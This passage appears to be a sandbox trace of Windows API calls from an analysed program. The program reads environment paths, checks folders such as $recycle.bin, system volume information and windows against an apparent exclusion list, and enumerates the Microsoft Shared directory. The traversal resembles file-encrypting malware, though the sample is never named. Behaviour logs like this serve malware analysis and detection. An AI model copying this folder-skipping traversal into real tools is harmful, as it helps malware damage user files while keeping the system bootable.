cbMultiByte=6, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\ition\\") returned 6 [0104.321] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Reserv", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="应W䱠@㎌W企@\x18㟬X\x18\x8f")) returned 0xffffffff [0104.321] GetLastError () returned 0x2 [0104.321] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=6, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="reserv㟀X ") returned 6 [0104.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\ition\\") returned 7 [0104.321] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Restore", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="应W䱠@僬W企@\x18㟄X\x18\x97")) returned 0xffffffff [0104.321] GetLastError () returned 0x2 [0104.322] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.322] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=7, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="restoreX ") returned 7 [0104.322] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.322] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.322] GlobalUnlock (hMem=0x450004) returned 0 [0104.322] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.322] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.322] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.322] GlobalUnlock (hMem=0x450004) returned 0 [0104.322] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.322] GlobalUnlock (hMem=0x45000c) returned 0 [0104.322] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.322] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x18ecbc, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0104.322] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aae8, cbMultiByte=15, lpWideCharStr=0x18e0bc, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\") returned 15 [0104.324] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.324] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x18ecbc, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0104.324] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79fe8, cbMultiByte=46, lpWideCharStr=0x18e0bc, cchWideChar=2047 | out: lpWideCharStr="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 46 [0104.324] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.324] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x18ecbc, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0104.324] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=15, lpWideCharStr=0x18e0bc, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0104.324] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.324] GetEnvironmentVariableA (in: lpName="WINDIR", lpBuffer=0x18ecbc, nSize=0x400 | out: lpBuffer="C:\\Windows") returned 0xa [0104.325] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=11, lpWideCharStr=0x18e0bc, cchWideChar=2047 | out: lpWideCharStr="c:\\windows\\ata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 [0104.325] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.325] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.325] GlobalUnlock (hMem=0x45000c) returned 0 [0104.325] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.325] GlobalLock (hMem=0x450004) returned 0x591988 [0104.325] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.325] GlobalUnlock (hMem=0x45000c) returned 0 [0104.325] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.325] GlobalUnlock (hMem=0x450004) returned 0 [0104.325] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.325] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=15, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr=":\\$recycle.bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0104.325] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.325] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=11, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="\\all users\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 [0104.326] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.326] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=9, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="\\appdata\\s\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 [0104.326] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.326] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=18, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="\\application data\\alpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 18 [0104.326] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.326] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=28, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr=":\\system volume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 28 [0104.326] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.326] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=10, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr=":\\windows\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 10 [0104.327] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.327] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=8, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr=":\\intel\\s\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 8 [0104.327] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.327] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=9, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr=":\\nvidia\\\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 [0104.327] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\", cchLength=0x2f | out: lpsz="c:\\program files\\common files\\microsoft shared\\") returned 0x2f [0104.327] SHGetMalloc (in: ppMalloc=0x18f10c | out: ppMalloc=0x18f10c*=0x767666bc) returned 0x0 [0104.327] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18f108 | out: ppidl=0x18f108) returned 0x0 [0104.327] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.328] SysReAllocStringLen (in: pbstr=0x18f190*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18f190*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.328] IMalloc:Free (This=0x767666bc, pv=0x578208) [0104.328] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0104.328] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0104.328] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.328] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.329] GlobalUnlock (hMem=0x450004) returned 0 [0104.329] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.329] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.329] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.329] GlobalUnlock (hMem=0x450004) returned 0 [0104.329] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.329] GlobalUnlock (hMem=0x45000c) returned 0 [0104.329] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\*.*", lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x587720 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW", cAlternateFileName="")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQUATION", cAlternateFileName="")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EURO", cAlternateFileName="")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Filters", cAlternateFileName="")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRPHFLT", cAlternateFileName="")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help", cAlternateFileName="")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ink", cAlternateFileName="")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69dc9750, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSClientDataMgr", cAlternateFileName="MSCLIE~1")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSInfo", cAlternateFileName="")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5d93940, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE14", cAlternateFileName="")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c23c830, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b0da70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69e61cd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PROOF", cAlternateFileName="")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd5807780, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd5807780, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smart Tag", cAlternateFileName="SMARTT~1")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef4d890, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef4d890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e177d26, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e177d26, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0104.329] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xcf4f23c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xcf4f23c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TextConv", cAlternateFileName="")) returned 1 [0104.330] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="THEMES14", cAlternateFileName="")) returned 1 [0104.330] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TRANSLAT", cAlternateFileName="")) returned 1 [0104.330] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Triedit", cAlternateFileName="")) returned 1 [0104.330] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBA", cAlternateFileName="")) returned 1 [0104.330] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd2c6940, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xd250e300, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd250e300, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VC", cAlternateFileName="")) returned 1 [0104.330] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x803feff7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x803feff7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VGX", cAlternateFileName="")) returned 1 [0104.330] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Visio Shared", cAlternateFileName="VISIOS~1")) returned 1 [0104.330] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6cdb800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6cdb800, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTO", cAlternateFileName="")) returned 1 [0104.330] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a02ad50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Folders", cAlternateFileName="WEBFOL~1")) returned 1 [0104.330] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", 